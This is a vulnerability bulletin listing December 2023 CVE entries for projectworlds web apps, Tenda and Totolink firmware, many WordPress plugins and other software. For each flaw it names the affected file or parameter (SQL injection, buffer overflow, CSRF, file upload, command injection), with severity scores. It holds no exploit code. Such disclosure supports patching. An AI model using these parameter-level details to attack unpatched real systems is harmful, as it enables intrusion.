projectworlds_pvt._limited -- online_matrimonial_projectOnline Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'filename' attribute of the 'pic3' multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-46791
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'psd' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48685
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'user' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48686
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'from' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48687
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'to' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48688
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'byname' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48689
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'bynum' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48690
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_id' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48716
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48717
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48718
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'roll_no' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48719
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'password' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48720
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48722
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'rno' parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48723
help@fluidattacks.com
help@fluidattacks.com
redpanda -- redpandaRedpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API.2023-12-189.8CVE-2023-50976
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
rmountjoy92 -- dashmachineA vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.2023-12-179.8CVE-2023-6899
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
rmountjoy92 -- dashmachineA vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability.2023-12-179.1CVE-2023-6900
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
shenzen_libituo_technology_co.,_ltd -- lbt-t300-t310_firmwareShenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi.2023-12-159.8CVE-2023-50469
cve@mitre.org
silabs -- gecko_software_development_kitAn unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory.2023-12-159.1CVE-2023-4020
product-security@silabs.com
product-security@silabs.com
softnext -- mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service.2023-12-158CVE-2023-48380
twcert@cert.org.tw
softnext -- mail_sqr_expertSoftnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48378
twcert@cert.org.tw
solarwinds -- access_rights_managerSensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment.2023-12-217.6CVE-2023-40058
psirt@solarwinds.com
sourcecodester -- best_courier_management_systemA vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256.2023-12-179.8CVE-2023-6898
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
starnight -- micro_http_serverIn MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI.2023-12-179.8CVE-2023-50965
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function.2023-12-209.8CVE-2023-50983
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function.2023-12-209.8CVE-2023-50984
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function.2023-12-209.8CVE-2023-50985
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function.2023-12-209.8CVE-2023-50986
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function.2023-12-209.8CVE-2023-50987
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function.2023-12-209.8CVE-2023-50988
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function.2023-12-209.8CVE-2023-50989
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function.2023-12-209.8CVE-2023-50990
cve@mitre.org
cve@mitre.org
tenda -- i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function.2023-12-209.8CVE-2023-50992
cve@mitre.org
cve@mitre.org
tongda -- tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-169.8CVE-2023-6885
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- a7100ru_firmwareA vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-189.8CVE-2023-6906
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tutao -- tutanotaTutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue.2023-12-159.3CVE-2023-46116
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
u-blox -- toby-l2A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well.. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280.2023-12-207.6CVE-2023-0011
vulnerability@ncsc.ch
uffizio -- gps_trackerA Remote Code Execution vulnerability exist in Uffizio's GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources2023-12-169.8CVE-2020-17485
cve@mitre.org
cve@mitre.org
uffizio -- gps_trackerAn improper access control vulnerability exists in Uffizio's GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed.2023-12-167.5CVE-2020-17483
cve@mitre.org
cve@mitre.org
unrealircd -- unrealircdA buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms.2023-12-167.5CVE-2023-50784
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
wangmarket -- wangmarketA vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.2023-12-179.8CVE-2023-6886
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wasmer_io -- wasmerWasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4.2023-12-228.4CVE-2023-51661
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
web-soudan -- mw_wp_formThe MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.2023-12-169.8CVE-2023-6559
security@wordfence.com
security@wordfence.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop - Global Dropshipping. This issue affects Zendrop - Global Dropshipping: from n/a through 1.0.0.2023-12-2010CVE-2023-25970
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin - JobWP. This issue affects WordPress Job Board and Recruitment Plugin - JobWP: from n/a through 2.0.2023-12-2010CVE-2023-29384
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0.2023-12-2010CVE-2023-49772
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23.2023-12-2010CVE-2023-49773
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6.2023-12-2110CVE-2023-49778
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5.2023-12-209.9CVE-2023-23970
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1.2023-12-209.1CVE-2023-28170
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1.2023-12-209.1CVE-2023-29102
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2.2023-12-209.9CVE-2023-31215
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65.2023-12-209.9CVE-2023-31231
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in xtemos WoodMart - Multipurpose WooCommerce Theme. This issue affects WoodMart - Multipurpose WooCommerce Theme: from n/a through 1.0.36.2023-12-219.8CVE-2023-32242
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4.2023-12-209.3CVE-2023-32590
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40.2023-12-209.9CVE-2023-33318
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3.2023-12-209.9CVE-2023-34007
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0.2023-12-209.9CVE-2023-34385
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in realmag777 HUSKY - Products Filter for WooCommerce Professional. This issue affects HUSKY - Products Filter for WooCommerce Professional: from n/a through 1.3.4.2.2023-12-209.8CVE-2023-40010
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Premio Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2.2023-12-209.1CVE-2023-40204
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts - Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts - Enable Users to Submit Posts from the Front End: from n/a through 20230902.2023-12-209CVE-2023-45603
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.2023-12-209.9CVE-2023-46149
audit@patchstack.com
wordpress -- wordpressMissing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9.2023-12-199.8CVE-2023-47754
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Porto Theme Porto Theme - Functionality. This issue affects Porto Theme - Functionality: from n/a before 2.12.1.2023-12-199.3CVE-2023-48738
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoonthemes Couponis - Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis - Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2.2023-12-199.8CVE-2023-49750
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoon themes Adifier - Classified Ads WordPress Theme. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.2023-12-209.3CVE-2023-49752
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6.2023-12-209.3CVE-2023-49776
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0.2023-12-209.1CVE-2023-49814
audit@patchstack.com
wordpress -- wordpressThe Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits.2023-12-189.8CVE-2023-6272
contact@wpscan.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1.2023-12-178.8CVE-2023-24380
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3.2023-12-208.3CVE-2023-28782
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft - Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft - Messages Database Plugin For WordPress: from n/a through 1.7.0.2023-12-208.5CVE-2023-29096
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme. This issue affects Houzez - Real Estate WordPress Theme: from n/a before 2.8.3.2023-12-208.2CVE-2023-29432
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23.2023-12-208.5CVE-2023-30495
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10.2023-12-208.5CVE-2023-30750
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2.2023-12-208.1CVE-2023-31092
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CrawlSpider SEO Change Monitor - Track Website Changes. This issue affects SEO Change Monitor - Track Website Changes: from n/a through 1.2.2023-12-208.5CVE-2023-33209
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox - UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox - UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1.2023-12-188.8CVE-2023-33214
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2.2023-12-188.8CVE-2023-34168
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1.2023-12-208.1CVE-2023-35876
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0.2023-12-198.3CVE-2023-37390
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6.2023-12-208.2CVE-2023-37871
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5.2023-12-208.3CVE-2023-40555
audit@patchstack.com
wordpress -- wordpressThe Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.2023-12-188.8CVE-2023-4311
contact@wpscan.com
wordpress -- wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2.2023-12-198.8CVE-2023-46212
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly - Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly - Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.2023-12-188.8CVE-2023-46617
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5.2023-12-188.8CVE-2023-47506
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3.2023-12-188.8CVE-2023-47787
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3.2023-12-188.8CVE-2023-47789
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7.2023-12-188.8CVE-2023-47806
audit@patchstack.com
wordpress -- wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5.2023-12-198.8CVE-2023-48751
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4.2023-12-188.8CVE-2023-48755
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13.2023-12-188.8CVE-2023-48762
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator - Add Animated SVG Easily. This issue affects SVGator - Add Animated SVG Easily: from n/a through 1.2.4.2023-12-188.8CVE-2023-48766
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9.2023-12-188.8CVE-2023-48768
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble - Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble - Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3.2023-12-188.8CVE-2023-48769
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0.2023-12-188.8CVE-2023-48772
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.2023-12-188.8CVE-2023-48773
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5.2023-12-188.8CVE-2023-48778
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0.2023-12-188.8CVE-2023-48781
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.2023-12-188.8CVE-2023-49153
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator - easily Button Builder. This issue affects Button Generator - easily Button Builder: from n/a through 2.3.8.2023-12-188.8CVE-2023-49155
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5.2023-12-188.8CVE-2023-49163
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2.2023-12-198.8CVE-2023-49164
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2.2023-12-158.8CVE-2023-49197
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3.2023-12-158.8CVE-2023-49744
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23.2023-12-158.8CVE-2023-49749
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0.2023-12-178.8CVE-2023-49751
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz - WooCommerce Comments. This issue affects WooDiscuz - WooCommerce Comments: from n/a through 2.3.0.2023-12-188.8CVE-2023-49759
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9.2023-12-188.8CVE-2023-49760
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0.2023-12-188.8CVE-2023-49761
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1.2023-12-188.8CVE-2023-49763
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4.2023-12-178.8CVE-2023-49769
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8.2023-12-178.8CVE-2023-49775
audit@patchstack.com
